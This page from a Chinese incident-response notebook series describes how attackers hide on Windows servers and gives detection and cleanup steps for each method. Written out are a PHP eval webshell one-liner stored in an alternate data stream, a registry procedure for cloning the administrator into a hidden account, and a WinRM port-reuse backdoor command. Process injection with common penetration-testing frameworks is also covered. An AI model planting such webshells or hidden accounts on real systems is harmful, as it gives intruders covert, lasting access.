应急响应实战笔记
第01章:入侵排查篇
第1篇:Windows 入侵排查
第2篇:Linux 入侵排查
第3篇:常见的 Webshell 查杀工具
第4篇:如何发现隐藏的 Webshell 后门
第5篇:勒索病毒自救指南
第02章:日志分析篇
第1篇:Windows日志分析
第2篇:Linux日志分析
第3篇:Web日志分析
第4篇:MSSQL日志分析
第5篇:MySQL日志分析
第03章:权限维持篇
第1篇:Windows权限维持--隐藏篇
第2篇:Windows权限维持--后门篇
第3篇:Linux权限维持--隐藏篇
第4篇:Linux权限维持--后门篇
第5篇:Windows命令行文件下载方式汇总
第6篇:三大渗透测试框架权限维持技术
第7篇:常见WebShell管理工具
第04章:Windows实战篇
第1篇:FTP暴力破解
第2篇:蠕虫病毒
第3篇:勒索病毒
第4篇:ARP病毒
第5篇:挖矿病毒(一)
第6篇:挖矿病毒(二)
第05章:Linux实战篇
第1篇:SSH暴力破解
第2篇:捕捉短连接
第3篇:挖矿病毒
第4篇:盖茨木马
第5篇:DDOS病毒
第06章:Web实战篇
第1篇:网站被植入Webshell
第2篇:门罗币恶意挖矿
第3篇:批量挂黑页
第4篇:新闻源网站劫持
第5篇:移动端劫持
第6篇:搜索引擎劫持
第7篇:网站首页被篡改
第8篇:管理员账号被篡改
第9篇:编辑器入侵事件
-
+
首页
第1篇:Windows权限维持--隐藏篇
### 0x00 前言 攻击者在获取服务器权限后,通常会用一些后门来维持权限,如果你想让你的后门保持的更久些,那么请隐藏好它,使之不易被管理员发现。 ### 0x01 隐藏文件 **1、利用文件属性** 最简单的一种隐藏文件的方式,文件右键属性,勾选隐藏,点击确定后,在这个文件里看不到刚刚的文件了。 ![](/media/202203//1647175337.9566436.png) 如果要让文件显示出来,就点击查看,勾选显示隐藏的文件,文件就显示出来。 ![](/media/202203//1647175337.9590209.png) 如何真正隐藏文件? 使用Attrib +s +a +h +r命令就是把原本的文件夹增加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性。 `attrib +s +a +h +r D:\test\project\test`.txt 这样就做到了真正的隐藏,不管你是否显示隐藏文件,此文件夹都看不见。 破解隐藏文件: 打开电脑文件夹选项卡,取消”隐藏受保护的操作系统文件“勾选,把”隐藏文件和文件夹“下面的单选选择“显示隐藏的文件、文件夹和驱动器”。 ![](/media/202203//1647175337.9599223.png) **2、利用ADS隐藏文件内容** 在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞: ``` echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg ``` 这样子就生成了一个不可见的shell hidden.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个hidden.jpg的。 ``` 问题1:如何查看index.php:hidden.jpg内容呢? 进入文件所在目录,notepad index.php:hidden.jpg 或者 dir /r 问题2:如何删除index.php:hidden.jpg? 直接删除index.php即可 ``` **3、驱动级文件隐藏** 驱动隐藏我们可以用过一些软件来实现,软件名字叫:Easy File Locker 下载链接: http://www.xoslab.com/efl.html 如果你在网站目录未查找到相关文件,且系统目录存在存在以下文件: ``` c:\WINDOWS\xlkfs.dat c:\WINDOWS\xlkfs.dll c:\WINDOWS\xlkfs.ini c:\WINDOWS\system32\drivers\xlkfs.sys ``` 那么你,应该是遭遇了驱动级文件隐藏。 如何清除? ~~~ 1、查询服务状态: sc qc xlkfs 2、停止服务: net stop xlkfs 服务停止以后,经驱动级隐藏的文件即可显现 3、删除服务: sc delete xlkfs 4、删除系统目录下面的文件,重启系统,确认服务已经被清理了。 ~~~ 隐藏文件的方式还有很多,比如伪装成一个系统文件夹图标,利用畸形文件名、保留文件名无法删除,甚至取一个与系统文件很像的文件名并放在正常目录里面,很难辨别出来。 这些隐藏文件的方式早已不再是秘密,而更多的恶意程序开始实现“无文件”攻击,这种方式极难被发现。 ### 0x02 隐藏账号 window 隐藏系统用户操作,CMD命令行下,建立了一个用户名为“test$”,密码为“abc123!”的简单隐藏账户,并且把该隐藏账户提升为了管理员权限。 ![](/media/202203//1647175337.9608243.png) PS:CMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。 克隆账号制作过程: 1、“开始”→“运行”,输入“regedt32.exe”后回车,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”,单机右建权限,把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。 ![](/media/202203//1647175337.9616845.png) 2、来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处,点击test$用户,得到在右边显示的键值中的“类型”一项显示为0x3ec,找到箭头所指目录。 ![](/media/202203//1647175337.963226.png) 3、找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EC”的F值中,保存。 ![](/media/202203//1647175337.9643152.png) 4、分别test$和“000003EC导出到桌面,删除test$用户 net user test$ /del ![](/media/202203//1647175337.9652376.png) 5、将刚才导出的两个后缀为.reg的注册表项导入注册表中。这样所谓的隐藏账户就创建好了。PS:不管你是在命令提示符下输入net user 或者在系统用户管理界面都是看不到test$这个账户的,只有在注册表中才能看得到。 检测和清理方法: 使用D盾_web查杀工具,使用克隆账号检测功能进行查看,可检测出隐藏、克隆账号。 ![](/media/202203//1647175337.9661531.png) ### 0x03 端口复用 通过端口复用来达到隐藏端口的目的,在Window下,如何实现端口复用呢? 前阵子,@Twi1ight公布了一种基于内置系统服务的端口复用后门方法,利用WinRM服务,一条命令实现端口复用后门: `winrm set winrm/config/service @{EnableCompatibilityHttpListener="true"}` 一般开启WinRM服务作为远程管理,但还是第一次听到可以作为端口复用,一种简单容易实现的端口复用方式。假设,攻击者已获取到administrator账号密码,连接远程WinRM服务执行命令: ![](/media/202203//1647175337.9670212.png) 当执行这条命令的同时,将在安全日志中留下痕迹, ![](/media/202203//1647175337.9678721.png) 另外,可以通过代码实现端口复用重定向,工具:https://github.com/crabkun/Switcher ### 0x04 进程注入 进程注入,一直是病毒木马的惯用手段,同时,它也是一种隐藏技术。在常见的渗透测试框架中,进程注入是怎么做的以及我们如何通过工具排查出来? **1、meterpreter会话注入** 当前权限无法获取hash值,查看目前系统进程 ![](/media/202203//1647175337.9688225.png) 通过migrate将进程注入到system进程后,成功获得hash值。 ![](/media/202203//1647175337.9703317.png) Window后门排查: 通过TCPview显示已建立的TCP连接,我们可以看到异常的连接,同时,恶意软件将以绿色显示不到一秒钟,然后变成红色消失,如此循环。 ![](/media/202203//1647175337.9713929.png) **2、Empire会话进程注入** 通过psinject模块进行会话注入,直接输入ps选择一个SYSTEM权限的进程PID,使用进程注入模块,来获取权限。如下图: ![](/media/202203//1647175337.972244.png) Window后门排查:利用process monitor或者火绒剑监控进程都可以定位到注入进程。 ![](/media/202203//1647175337.9731417.png) ![](/media/202203//1647175337.9741812.png) **3、Cobalt Strike进程注入** 选择进程,点击inject,随后选择监听器,点击choose,即可发现Cobaltstrike弹回了目标机的一个新会话,这个会话就是成功注入到某进程的beacon。 ![](/media/202203//1647175337.9757557.png) ![](/media/202203//1647175337.9767582.png) Window后门排查:利用process monitor捕捉通信过程,有规律的请求取决于sleep设置的间隔。 ![](/media/202203//1647175337.977724.png) ### 0x05 结束 本文主要介绍了Window下的几种隐藏技术,包括隐藏文件、隐藏账号、端口复用、进程注入等方面的简单实现及其排查技巧。仅作抛砖引玉之用,欢迎留言分享。
admin
2022年3月13日 20:42
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
关于 睿文
如果睿文给你带来了帮助,欢迎对作者进行一些打赏捐助,这将有力支持作者持续投入精力更新和维护文档,感谢你的捐助!
微信
支付宝
QQ
PayPal
Markdown文件
分享
链接
类型
密码
更新密码